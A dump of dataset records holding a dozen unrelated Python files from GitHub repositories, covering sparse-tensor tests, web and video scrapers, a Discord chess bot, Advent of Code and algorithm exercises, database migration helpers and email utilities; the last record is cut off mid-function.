get_rand_vals\n\nimport unittest\nimport random\n\nsweep_size = 10\n\n\ndef sweep(**kwargs):\n def wrapped_f(f):\n swept_args = []\n for _ in range(sweep_size):\n args = {}\n for arg in kwargs:\n a = kwargs[arg]\n if type(a) is list:\n args[arg] = random.choice(a)\n else:\n args[arg] = a\n swept_args.append(args)\n\n def f_(*args, **kwargs):\n for kw in swept_args:\n print(\"running\", f.__name__, \"with\", kw)\n f(*args, **kw)\n\n return f_\n\n return wrapped_f\n\n\ncuda = torch.device(\"cuda\")\n\n\nclass TestBlockSparseTensor(unittest.TestCase):\n def test_ident(self):\n X = torch.randn(128, 128, device=cuda)\n W = torch.eye(128, device=cuda)\n bs_W = ts.createBlockSparseTensor(W, torch.ones(8, 8))\n Y = ts.mm(X, bs_W)\n torch.testing.assert_allclose(X, Y)\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_fwd(self, mb, i, o, block_size):\n X, masked_W, bs_W = get_rand_vals(mb, i, o, block_size)\n Y = ts.mm(X, bs_W)\n Y_ref = X @ masked_W\n torch.testing.assert_allclose(Y, Y_ref)\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_bwd_dx(self, mb, i, o, block_size):\n X1, masked_W, bs_W = get_rand_vals(mb, i, o, block_size)\n X2 = X1.clone()\n X1.requires_grad = True\n X2.requires_grad = True\n\n Y = ts.mm(X1, bs_W)\n Y.sum().backward()\n Y_ref = X2 @ masked_W\n Y_ref.sum().backward()\n torch.testing.assert_allclose(Y, Y_ref)\n torch.testing.assert_allclose(X1.grad, X2.grad)\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_bwd_dw(self, mb, i, o, block_size):\n X, masked_W, bs_W, mask = get_rand_vals(mb, i, o, block_size, True)\n\n masked_W.requires_grad = True\n bs_W.data.requires_grad = True\n\n ts.mm(X, bs_W).sum().backward()\n (X @ masked_W).sum().backward()\n torch.testing.assert_allclose(\n (masked_W.grad * mask).flatten().sum(), bs_W.data.grad.flatten().sum()\n )\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_bwd_g_dx(self, mb, i, o, block_size):\n X1, _, bs_W, mask = get_rand_vals(mb, i, o, block_size, True)\n X2 = X1.clone()\n X1.requires_grad = True\n X2.requires_grad = True\n\n Y = torch.randn(mb, o, device=cuda)\n\n bs_W = ts.mm_out(X1.t(), Y, bs_W)\n W = (X2.t() @ Y) * mask\n torch.testing.assert_allclose(bs_W.data.sum(), W.sum())\n\n bs_W.data.sum().backward()\n W.sum().backward()\n torch.testing.assert_allclose(X1.grad, X2.grad)\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_bwd_g_dy(self, mb, i, o, block_size):\n X, _, bs_W, mask = get_rand_vals(mb, i, o, block_size, True)\n\n Y1 = torch.randn(mb, o, device=cuda)\n Y2 = Y1.clone()\n Y1.requires_grad = True\n Y2.requires_grad = True\n\n bs_W = ts.mm_out(X.t(), Y1, bs_W)\n W = (X.t() @ Y2) * mask\n torch.testing.assert_allclose(bs_W.data.sum(), W.sum())\n\n bs_W.data.sum().backward()\n W.sum().backward()\n torch.testing.assert_allclose(Y1.grad, Y2.grad)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"bwasti/sparse","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"708994353","text":"import requests\nimport pandas as pd \nimport os \nimport argparse\nimport tqdm\n\nparser = argparse.ArgumentParser(\"Scrape training and validation videos for the next dataset\")\nparser.add_argument(\"--split\", choices=[\"training\", \"validation\"])\n\nargs = parser.parse_args()\n\nBASE_LINK = \"https://multimedia-commons.s3-us-west-2.amazonaws.com/data/videos/mp4/{first_3}/{second_3}/{filename}\"\n\nmissing_videos = []\ncompleted_videos = [os.path.splitext(f)[0] for dp, dn, filenames in os.walk(\"training_videos\") for f in filenames if os.path.splitext(f)[1] == '.mp4']\ndf = pd.read_csv(f\"{args.split}_link_mapping.csv\")\nfor id, row in tqdm.tqdm(df.iterrows()):\n if str(row[\"video_id\"]) in completed_videos:\n continue\n hash = row[\"video_hash\"]\n video_path = row[\"video_path\"]\n save_file = f\"{row['video_id']}.mp4\"\n first_3 = hash[:3]\n second_3 = hash[3:6]\n filename = f\"{hash}.mp4\"\n url = BASE_LINK.format(first_3=first_3, second_3=second_3, filename=filename)\n # print(url)\n retries = 0 \n try:\n response = requests.get(url)\n except:\n retries += 1 \n while (retries < 5):\n try:\n response = requests.get(url)\n except:\n retries += 1 \n if retries == 5:\n missing_videos.append([row[\"video_id\"], row[\"video_hash\"], row[\"video_path\"]])\n print(f\"Couldn't find video for {url}\")\n continue\n if str(response.status_code).startswith(\"2\"):\n os.makedirs(os.path.join(f\"{args.split}_videos\", os.path.dirname(video_path)), exist_ok=True)\n with open(os.path.join(f\"{args.split}_videos\", os.path.dirname(video_path), save_file), \"wb\") as f:\n f.write(response.content)\n else:\n missing_videos.append([row[\"video_id\"], row[\"video_hash\"], row[\"video_path\"]])\n \n # break\n\nif len(missing_videos):\n df = pd.DataFrame(missing_videos, columns=[\"video_id\", \"video_hash\", \"video_path\"])\n df.to_csv(f\"{args.split}_missing_videos.csv\", index=False)","repo_name":"11777-MMML/11777-videoQA","sub_path":"videos_scraping/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70149086953","text":"import pandas as pd\nimport pytest\n\nfrom ..sampling import extend_sep_for_sampling, rebase_at_each_filing_sampling\nfrom ..dataset import Dataset\nfrom ..processing.engine import pandas_mp_engine\n\n\"\"\"\nTest datasets:\n/datasets/testing/...\nComplete data for for AAPL, NTK (Consumer Electronics) and FCX (Copper)\nsep.csv\nsf1_art.csv\nsf1_arq.csv\n\"\"\"\n\nsep = None\nsf1_art = None\nsf1_arq = None\nmetadata = None\n\nsep_extended = None\nsep_sampled = None\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef setup():\n # Will be executed before the first test in the module\n global sep, sf1_art, sf1_arq, metadata\n global sep_extended, sep_sampled\n sep = pd.read_csv(\"../datasets/testing/sep.csv\", parse_dates=[\"date\"], index_col=\"date\", low_memory=False)\n sf1_art = pd.read_csv(\"../datasets/testing/sf1_art.csv\", parse_dates=[\"calendardate\", \"datekey\"], index_col=\"calendardate\", low_memory=False)\n sf1_arq = pd.read_csv(\"../datasets/testing/sf1_arq.csv\", parse_dates=[\"calendardate\", \"datekey\"], index_col=\"calendardate\", low_memory=False)\n metadata = pd.read_csv(\"../datasets/sharadar/SHARADAR_TICKERS_METADATA.csv\", low_memory=False)\n \n yield\n \n # Will be executed after the last test in the module\n if isinstance(sep_extended, pd.DataFrame):\n sep_extended.sort_values(by=[\"ticker\", \"date\"], inplace=True)\n sep_extended.to_csv(\"../datasets/testing/sep_extended.csv\")\n if isinstance(sep_sampled, pd.DataFrame):\n sep_sampled.sort_values(by=[\"ticker\", \"date\"], inplace=True)\n sep_sampled.to_csv(\"../datasets/testing/sep_sampled.csv\")\n\n\ndef test_extend_sep_for_sampling():\n global sep, sf1_art, sf1_arq, metadata\n global sep_extended\n\n sep_extended = pandas_mp_engine(callback=extend_sep_for_sampling, atoms=sep, \\\n data={\"sf1_art\": sf1_art, \"metadata\": metadata}, \\\n molecule_key='sep', split_strategy='ticker', \\\n num_processes=1, molecules_per_process=1)\n\n \"\"\"\n Test that a SEP file containing multiple tickers will get the correct sf1 \n datekey from sf1_art file with multiple tickers.\n \"\"\"\n # Tests for AAPL\n # date_1998_12_23 = pd.to_datetime(\"1998-12-23\") \n # date_1999_01_04 = pd.to_datetime(\"1999-01-04\") # datekey should be: 1998-12-23\n # date_1999_02_05 = pd.to_datetime(\"1999-02-05\") # datekey should be: 1999-12-23\n # date_1999_02_08 = pd.to_datetime(\"1999-02-08\") # datekey should be: 1999-02-08\n # date_1999_02_11 = pd.to_datetime(\"1999-02-11\") # datekey should be: 1999-02-08\n\n sep_extended_aapl = sep_extended.loc[sep_extended[\"ticker\"] == \"AAPL\"]\n\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"datekey\"] == pd.to_datetime(\"1998-12-23\") \n assert sep_extended_aapl.loc[\"1999-02-05\"][\"datekey\"] == pd.to_datetime(\"1998-12-23\")\n assert sep_extended_aapl.loc[\"1999-02-08\"][\"datekey\"] == pd.to_datetime(\"1999-02-08\")\n assert sep_extended_aapl.loc[\"1999-02-11\"][\"datekey\"] == pd.to_datetime(\"1999-02-08\")\n\n # Test metadata was set correctly\n metadata_aapl = metadata.loc[metadata[\"ticker\"] == \"AAPL\"].iloc[-1]\n\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"industry\"] == metadata_aapl[\"industry\"]\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"sector\"] == metadata_aapl[\"sector\"]\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"siccode\"] == metadata_aapl[\"siccode\"]\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"sharesbas\"] == \\\n sf1_art.loc[sf1_art.datekey == sep_extended_aapl.loc[\"1999-01-04\"][\"datekey\"]].iloc[-1][\"sharesbas\"]\n\n # Tests for NTK\n sep_extended_ntk = sep_extended.loc[sep_extended[\"ticker\"] == \"NTK\"]\n\n assert sep_extended_ntk.loc[\"2011-03-31\"][\"datekey\"] == pd.to_datetime(\"2011-03-31\")\n assert sep_extended_ntk.loc[\"2011-05-04\"][\"datekey\"] == pd.to_datetime(\"2011-03-31\")\n\n\n@pytest.mark.skip()\ndef test_rebase_at_each_filing_sampling():\n global sep_extended\n global sep_sampled\n\n\n sep_sampled = pandas_mp_engine(callback=rebase_at_each_filing_sampling, atoms=sep_extended, data=None, \\\n molecule_key='observations', split_strategy='ticker', num_processes=1, molecules_per_process=1, \\\n days_of_distance=20)\n\n sep_sampled = sep_sampled.sort_values(by=[\"ticker\", \"date\"])\n\n sep_sampled.to_csv(\"../datasets/testing/sep_sampled_latest_implementation.csv\")\n\n sep_sampled_aapl = sep_sampled.loc[sep_sampled.ticker == \"AAPL\"]\n\n assert sep_sampled_aapl.index[0] == pd.to_datetime(\"1997-12-31\")\n assert sep_sampled_aapl.index[1] == pd.to_datetime(\"1998-02-09\")\n assert sep_sampled_aapl.index[2] == pd.to_datetime(\"1998-03-09\")\n assert sep_sampled_aapl.index[3] == pd.to_datetime(\"1998-04-09\")\n assert sep_sampled_aapl.index[4] == pd.to_datetime(\"1998-05-11\")\n assert sep_sampled_aapl.index[5] == pd.to_datetime(\"1998-06-11\")\n assert sep_sampled_aapl.index[6] == pd.to_datetime(\"1998-07-10\")\n assert sep_sampled_aapl.index[7] == pd.to_datetime(\"1998-08-10\")\n assert sep_sampled_aapl.index[8] == pd.to_datetime(\"1998-09-10\")\n\n \n \"\"\"\n AAPL\n Date\n 1997-12-31\n 1998-02-09\n 1998-03-09\n 1998-04-09\n 1998-05-11\n 1998-06-11\n 1998-07-10\n 1998-08-10\n 1998-09-10\n 1998-10-09\n 1998-11-10\n 1998-12-23\n 1999-02-08\n 1999-03-08\n 1999-04-08\n 1999-05-11\n 1999-06-11\n Datekey\n 1997-12-05\n 1998-02-09\n 1998-02-09\n 1998-02-09\n 1998-05-11\n 1998-05-11\n 1998-05-11\n 1998-08-10\n 1998-08-10\n 1998-08-10\n 1998-08-10\n 1998-12-23\n 1999-02-08\n 1999-02-08\n 1999-02-08\n 1999-05-11\n 1999-05-11\n 1999-05-11\n 1999-08-06\n 1999-08-06\n 1999-08-06\n \"\"\"\n\n\n\n\n@pytest.mark.skip()\ndef test_rebase_at_each_filing_sampling_OLD():\n global sep_extended\n global sep_sampled\n\n\n sep_sampled = pandas_mp_engine(callback=rebase_at_each_filing_sampling, atoms=sep_extended, data=None, \\\n molecule_key='observations', split_strategy='ticker', num_processes=1, molecules_per_process=1, \\\n days_of_distance=20)\n \n # Tests for AAPL\n first_9_apple_samples = [\n pd.to_datetime(\"1999-02-08\"), \n pd.to_datetime(\"1999-03-08\"), \n pd.to_datetime(\"1999-04-08\"), \n pd.to_datetime(\"1999-05-11\"), \n pd.to_datetime(\"1999-06-11\"), \n pd.to_datetime(\"1999-07-12\"), \n pd.to_datetime(\"1999-08-06\")\n ]\n\n first_6_ntk_samples = [\n pd.to_datetime(\"2011-03-31\"),\n # pd.to_datetime(\"2011-04-29\"), This sample is less than 20 day before a new filing, and should therefore not be among the samples\n pd.to_datetime(\"2011-05-12\"),\n pd.to_datetime(\"2011-06-13\"),\n pd.to_datetime(\"2011-07-12\"),\n pd.to_datetime(\"2011-08-09\"),\n pd.to_datetime(\"2011-09-09\"),\n\n ]\n\n apple_samples = sep_sampled.loc[sep_sampled[\"ticker\"] == \"AAPL\"].loc[\"1999-02-08\":\"1999-08-06\"]\n ntk_samples = sep_sampled.loc[sep_sampled[\"ticker\"] == \"NTK\"].loc[\"2011-03-31\":\"2011-09-09\"]\n\n # print(ntk_samples[[\"datekey\"]])\n\n index = 0\n for date, sample in apple_samples.iterrows():\n assert first_9_apple_samples[index] == date\n index += 1\n\n index = 0\n for date, sample in ntk_samples.iterrows(): \n assert first_6_ntk_samples[index] == date\n index += 1\n\n\n\n@pytest.mark.skip(reason=\"Not interested in this atm, this test is not completed\")\ndef test_first_filing_based_sampling():\n global sep_extended\n global sep_sampled\n\n sep_extended = pandas_mp_engine(callback=first_filing_based_sampling, atoms=sep_extended, \\\n data=None, molecule_key='sep', split_strategy='ticker', num_processes=1, molecules_per_process=1)\n\n\n print(sep_sampled[\"date\"])\n print(sep_sampled[\"datekey\"])\n assert False\n","repo_name":"DidrikF/automated-trading-system","sub_path":"dataset_development/tests/test_sampling.py","file_name":"test_sampling.py","file_ext":"py","file_size_in_byte":7667,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"71916833192","text":"import sys\n# memorization, closely related to dynamic programming\n# DP: top down, breakthe problem up as you reuse previous result\n\n# key is what you have, value is what you calculate\n\n# fibonacci sequence\n# a function that returns the n-th item in the fibonacci sequence\n# golden proportion\n\n# 0 1 1 2 3 5 8 13 21 34 55 89\n\n# let's do it recursively\ncache = {}\n\n\ndef fib(n):\n\n if n == 0 or n == 1:\n return n\n else:\n if n in cache:\n return cache[n]\n else:\n cache[n] = fib(n - 1) + fib(n - 2)\n\n return cache[n]\n\n\nprint(fib(3)) # 2\nprint(fib(11)) # 89\nprint(fib(25))\nprint(fib(500))\nprint(sys.getrecursionlimit())\n","repo_name":"Edudeiko/Hash-tables-module-project-CS","sub_path":"notebooks/memorization.py","file_name":"memorization.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74907980393","text":"class Funcionario: \n def __init__(self, nome, cpf, salario): \n self._nome = nome \n self._cpf = cpf \n self._salario = salario\n\nclass Gerente(Funcionario): \n\n def __init__(self, senha, qtd_funcionarios, nome, cpf, salario): \n self._senha = senha \n self._qtd_funcionarios = qtd_funcionarios \n Funcionario.__init__(self, nome, cpf, salario)\n\n def autentica(self, senha): \n if self._senha == senha: \n print(\"acesso permitido\") \n return True \n else: \n print(\"acesso negado\")\n return False\n\n def getNome(self):\n return self._nome\n\n\nnome = \"Hermano\"\ncpf = '000'\nsalario = 10\nsenha = '12345'\nqtd_funcionarios = 5\n","repo_name":"daysonn/repositorio_estruturas_dados","sub_path":"Classes/Heranca/funcionario.py","file_name":"funcionario.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20892459786","text":"PLAYERS_PER_GAME = 2\nWORDS_PER_SENTENCE = 10\nROUNDS_PER_GAME = 10\nNUMBER_COMPUTER_SENTENCES = 2\nMARKOV_STATE_SIZE = 2\nOPTIONS_PRESENTED = 3\n\nFIRST_WORD_CHOICE_TIME_SECONDS = 5\nWORD_CHOICE_TIME_SECONDS = 3\nGUESS_TIME_SECONDS = 10\nREVEAL_TIME_SECONDS = 8\nINACTIVITY_TIMEOUT_SECONDS = 5\n\nCOOKIE_NAME = 'markov'\n\nGAME_STATUS_PREGAME = 'pregame'\nGAME_STATUS_WRITING = 'writing'\nGAME_STATUS_GUESS_TIME = 'guess_time'\nGAME_STATUS_REVEAL = 'reveal'\nGAME_STATUS_POSTGAME = 'postgame'\n\nMESSAGE_JOINED_QUEUE = 'join_queue'\nMESSAGE_GAME_READY = 'game_ready'\n\nFALLBACK_WORDS = [\n 'if', 'and', 'or', 'but', 'into', 'so', 'with', 'for'\n]\n\nwith open('prompts.txt', 'r') as f:\n PROMPTS = f.read().split('\\n')\n","repo_name":"colinhostetter/markov-game","sub_path":"app/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11135135863","text":"#pylint: disable=missing-module-docstring,missing-function-docstring,invalid-name\nfrom typing import List\n\nfrom lib import check_coordinates\nfrom lib import inputgetter_int_matrix\nfrom lib import Matrix\n\nmatrix: Matrix = inputgetter_int_matrix('inputs/11.txt')\ntests_matrix: Matrix = inputgetter_int_matrix('tests/11.txt')\n\ndef increase_by_one(m) -> Matrix:\n for x, row in enumerate(m):\n for y, _ in enumerate(row):\n m[x][y] += 1\n return m\n\ndef flash_increase(x, y, m) -> Matrix:\n for x_inc in (-1, 0, 1):\n for y_inc in (-1, 0, 1):\n if check_coordinates(x+x_inc, y+y_inc, m):\n m[x+x_inc][y+y_inc] += 1\n return m\n\ndef caused_more_flashes(m, flashes_in_step) -> bool:\n # This is equivalent to\n # while any(m[x][y] > 9 for x in range(len(m)) for y in range(len(m[0])) if (x,y) not in flashes_in_step):\n # which is arguably a too long line\n for x, row in enumerate(m):\n for y, col in enumerate(row):\n if (x,y) not in flashes_in_step:\n if col > 9:\n return True\n return False\n\ndef solve(m) -> None:\n flashes = 0\n for i in range(1, 1000):\n m = increase_by_one(m)\n flashes_in_step = []\n while caused_more_flashes(m, flashes_in_step):\n for x, row in enumerate(m):\n for y, col in enumerate(row):\n if col > 9 and (x,y) not in flashes_in_step:\n m = flash_increase(x, y, m)\n flashes_in_step.append((x,y))\n flashes += len(flashes_in_step)\n if len(flashes_in_step) == len(m)*len(m[0]):\n print(f\"The solution to part 2 is: {i}\")\n break\n if i == 100:\n print(f\"The solution to part 1 is: {flashes}\")\n for x, y in flashes_in_step:\n m[x][y] = 0\n\nsolve(tests_matrix)\nsolve(matrix)\n","repo_name":"micr0cuts/challenges","sub_path":"advent-of-code-2021/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2810285258","text":"import discord\r\nfrom discord.ext import commands,tasks\r\nimport chessdotcom as chess\r\nimport random\r\nimport requests\r\nimport json\r\nimport asyncio\r\nimport itertools\r\n\r\n\r\nclass Chess(commands.Cog):\r\n def __init__(self,bot):\r\n self.bot=bot\r\n\r\n \r\n\r\n @commands.command(aliases=[\"chessprofile\"])\r\n async def get_player(self,ctx,*,username):\r\n try:\r\n data = chess.get_player_profile(username).json\r\n data1=chess.is_player_online(username).json\r\n data2=chess.get_player_clubs(username).json\r\n profile=discord.Embed(title=data['username'],description=data['name'] if 'name' in data else \"No name given\",color=discord.Colour.red())\r\n profile.set_thumbnail(url=data['avatar'] if 'avatar' in data else \"https://betacssjs.chesscomfiles.com/bundles/web/images/noavatar_l.1c5172d5.gif\")\r\n profile.add_field(name=\"Country:\",value=data['country'],inline=False)\r\n profile.add_field(name=\"Followers:\",value=data['followers'],inline=False)\r\n profile.add_field(name=\"Status:\",value=data['status'],inline=False)\r\n profile.add_field(name=\"Online:\",value=\"Yes\" if data1['online'] else \"No\",inline=False)\r\n profile.add_field(name=\"Url:\",value=data['url'],inline=False)\r\n for i in data2['clubs']:\r\n profile.add_field(name=\"Club:\",value=i['name'],inline=False)\r\n await ctx.send(embed=profile)\r\n except Exception as e:\r\n print(e)\r\n await ctx.send(\"Username doesnot exist\")\r\n\r\n @commands.command(aliases=[\"leaderboards\"])\r\n async def print_leaderboards(self,ctx):\r\n await ctx.send(\"Leaderboards\")\r\n data = chess.get_leaderboards().json\r\n categories = data.keys()\r\n for category in categories:\r\n await ctx.send('Category:'+str(category))\r\n for idx, entry in enumerate(data[category]):\r\n if idx<3:\r\n await ctx.send(f'Rank: {idx + 1} | Username: {entry[\"username\"]} | Rating: {entry[\"score\"]}')\r\n else:\r\n break\r\n @commands.command(aliases=[\"stats\"])\r\n async def get_player_rating(self,ctx,*,username):\r\n await ctx.send(\"Player Ratings\")\r\n data = chess.get_player_stats(username).json\r\n categories = ['chess_blitz', 'chess_rapid', 'chess_bullet']\r\n for category in categories:\r\n await ctx.send('Category:'+str(category))\r\n await ctx.send(f'Current: {data[category][\"last\"][\"rating\"]}')\r\n await ctx.send(f'Best: {data[category][\"best\"][\"rating\"]}')\r\n await ctx.send(f'Record: {data[category][\"record\"]}')\r\n\r\n @commands.command()\r\n async def chesspuzzle(self,ctx):\r\n await ctx.send(\"Random Puzzle\")\r\n data = chess.get_random_daily_puzzle().json\r\n await ctx.send(data['title'])\r\n await ctx.send(data['image'])\r\n await ctx.send(data['url'])\r\n\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Chess(bot))\r\n","repo_name":"Mastermind-sap/joker","sub_path":"cogs/chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"71891992552","text":"\ndef solution(number, k):\n from collections import deque\n \n num_lst = deque(number)\n removed_nums = sorted(num_lst)[:k]\n \n answer = []\n cnt = 0\n # 남겨야 하는 숫자\n \n for i in range(len(number)): \n if num_lst[i] in removed_nums:\n num_lst.popleft()\n continue\n else:\n answer.append(num_lst[i])\n if cnt == k:\n answer.append(num_lst[i:])\n break\n \n return answer","repo_name":"data-sign/algorithm","sub_path":"프로그래머스/lv2/42883. 큰 수 만들기/큰 수 만들기.py","file_name":"큰 수 만들기.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"162773719","text":"import difflib\n\nfrom mail.devpack.lib.components.postgres import Postgres\nfrom mail.devpack.tests.helpers.fixtures import coordinator_factory\n\n\ndef template_migration_check(db_comp_cls, partition_tables=None):\n with coordinator_factory(db_comp_cls) as coord:\n return check_migrations_simple(coord.components[db_comp_cls], partition_tables=partition_tables)\n\n\ndef check_migrations_simple(db, partition_tables=None):\n \"\"\"\n :type db: Postgres\n :type partition_tables: list[str]\n \"\"\"\n return check_migrations(\n db.pg,\n users=db.users,\n partition_tables=partition_tables,\n before_all_prefixes=db.before_all_prefixes,\n after_all_prefixes=db.after_all_prefixes,\n snapshot_sql_files=db.snapshot_sql_files,\n migration_prefixes=db.migration_prefixes,\n )\n\n\ndef check_migrations(db, users, partition_tables,\n before_all_prefixes, after_all_prefixes, snapshot_sql_files, migration_prefixes):\n db_snapshot = Postgres(\n dbname=db.dbname + '_from_snapshot',\n port=db.port + 1,\n users=users,\n ddl_prefixes=before_all_prefixes + snapshot_sql_files + after_all_prefixes,\n root=db.root,\n )\n db_migrations = Postgres(\n dbname=db.dbname + '_from_migrations',\n port=db.port + 2,\n users=users,\n ddl_prefixes=before_all_prefixes + migration_prefixes + after_all_prefixes,\n root=db.root,\n )\n\n with db_snapshot.standalone(), db_migrations.standalone():\n delta = compare_db_dumps(\n db_snapshot.pg,\n db_migrations.pg,\n partition_tables=partition_tables\n )\n assert not delta, '\\n' + delta\n\n\ndef compare_db_dumps(db1, db2, partition_tables=None):\n \"\"\"\n :type db1: Postgresql\n :type db2: Postgresql\n :type partition_tables: list\n :return: dumped databases diff\n \"\"\"\n if partition_tables is None:\n partition_tables = []\n dump1 = db1.dump(partition_tables=partition_tables).split('\\n')\n dump2 = db2.dump(partition_tables=partition_tables).split('\\n')\n return '\\n'.join(difflib.context_diff(dump1, dump2, db1.dbname, db2.dbname, n=5, lineterm=''))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/helpers/pg_helpers.py","file_name":"pg_helpers.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21956787966","text":"import collections\nimport uuid\nfrom datetime import date\n\nfrom jinja2 import Template\nfrom src.models import db, Notes, Users\n\nfrom .logger import logging\n# from .send_email import send_email\nfrom .send_email import multi_send_send_email\n\n\ndef generate_uuid4_hex():\n id = uuid.uuid4()\n return id.hex\n\n\n# todo create a generalic lass with templates\ndef email_template_renderer(data, ingress):\n html_email = \"\"\"\n \n \n \n Test Email Sample\n \n \n \n \n \n \n
    \n {% for value in data %}\n

    {{value[1]}}

    \n
  • Subject: {{value[4]}}
  • \n
  • Text: {{value[2]}}
  • \n
  • URL: LINK
  • \n
    \n {% endfor %}\n
\n \n \n \"\"\"\n html_email_msg = Template(html_email)\n return html_email_msg.render(data=data, ingress=ingress)\n\n#\n# def send_auth_mail(alternative_id, auth_token, user_email, subject):\n# email_msg_html = email_template_renderer_auth_test(alternative_id,\n# auth_token,\n# ingress=app.config.get(\"INGRESS\"))\n# send_email_to_user(user_email, email_msg_html, subject)\n# return True\n\n\ndef send_email_manual_all(user_mail, ingress):\n # try:\n logging.info(\"mailer ::: send_email_manual_all ::: called\")\n # todo write a separate function to process email msg's\n mail_subject = user_mail.topic\n for el in user_mail.data_to_send.items():\n email_to_send = el[0]\n logging.info(f\"mailer ::: send_email_manual_all ::: send to: {email_to_send}\")\n data = el[1]\n email_msg_html = email_template_renderer(data, ingress)\n\n multi_send_send_email(str(email_to_send),\n email_msg_html,\n mail_subject=user_mail.MSG_SUBJECTS[mail_subject])\n logging.info(\"mailer ::: send_email_manual_all ::: mail sent\")\n return True, \"success\"\n\n\ndef preapare_data_for_sending(data):\n try:\n logging.info(\"mailer ::: PREAPARE_DATA_FOR_SENDING ::: called\")\n dict_x = collections.defaultdict(list)\n for el in data:\n dict_x.setdefault(el.Users.email, []).append([el.Notes.id,\n el.Notes.topic,\n el.Notes.text,\n el.Notes.url,\n el.Notes.subject,\n el.Users.username])\n logging.info(f\"mailer ::: PREAPARE_DATA_FOR_SENDING ::: dict_x: {dict_x}\")\n return dict_x\n except Exception as msg:\n logging.error(f\"mailer ::: PREAPARE_DATA_FOR_SENDING ::: ERROR {msg}\")\n\n\ndef get_date_today():\n return date.today()\n\n\ndef query_user_notes():\n logging.info(\"mailer ::: QUERY_USER_NOTES ::: called\")\n try:\n return db.session.query(Notes, Users). \\\n join(Users, Users.id == Notes.user_id). \\\n filter(Notes.repeat_at <= get_date_today()).all()\n except Exception as msg:\n logging.error(f\"mailer ::: QUERY_USER_NOTES ::: QUERY ERROR {msg}\")\n return False\n","repo_name":"wlapie40/reminder-app-py38","sub_path":"services/mailer/src/common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23274796601","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nimport re\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\"\n}\n\ndef get_product_info(url):\n # Send the GET request to the URL with the headers\n response = requests.get(url, headers=headers)\n\n # Check if the response was successful\n if response.status_code != 200:\n print(f\"The request was not successful. Status code: {response.status_code}\")\n exit()\n\n # Parse the HTML content of the page\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n if 'amazon.in' in url:\n # Find the product name\n product_name_element = soup.find('span', {'id': 'productTitle'})\n if product_name_element:\n product_name = product_name_element.text.strip()\n\n # Find the product price\n product_price_element = soup.find('span',{'class':'a-price-whole'})\n if product_price_element:\n product_price_str = product_price_element.text.strip().replace(\",\", \"\")\n product_price = float(product_price_str)\n \n # Determine the best time to buy the product\n buying_time = determine_buying_time()\n\n return {\"product_name\": product_name, \"product_price\": product_price, \"buying_time\": buying_time}\n \n elif 'flipkart.com' in url:\n # Find the product name\n product_name_element = soup.find(\"span\", {\"class\": \"B_NuCI\"})\n product_name = product_name_element.text.strip()\n\n # Find the product price\n product_price_element= soup.find('div',{'class': '_30jeq3 _16Jk6d'})\n product_price_str = product_price_element.text.strip().replace(\",\",\"\")\n product_price_str = product_price_str.replace(\"₹\", \"\")\n product_price = float(product_price_str)\n\n # Determine the best time to buy the product\n buying_time = determine_buying_time()\n\n return {\"product_name\": product_name, \"product_price\": product_price, \"buying_time\": buying_time}\n \n elif 'snapdeal.com' in url:\n # Find the element containing the product name\n product_name_element = soup.find('h1', {'class': 'pdp-e-i-head'})\n\n # Extract the product name\n product_name = product_name_element.text.strip()\n\n # Find the element containing the product price\n price_element = soup.find('span', {'class': 'payBlkBig'})\n\n # Extract the price value\n product_price = re.sub('[^0-9]+', '', price_element.text.strip())\n\n # Determine the best time to buy the product\n buying_time = determine_buying_time()\n\n return {\"product_name\": product_name, \"product_price\": product_price, \"buying_time\": buying_time}\n\ndef 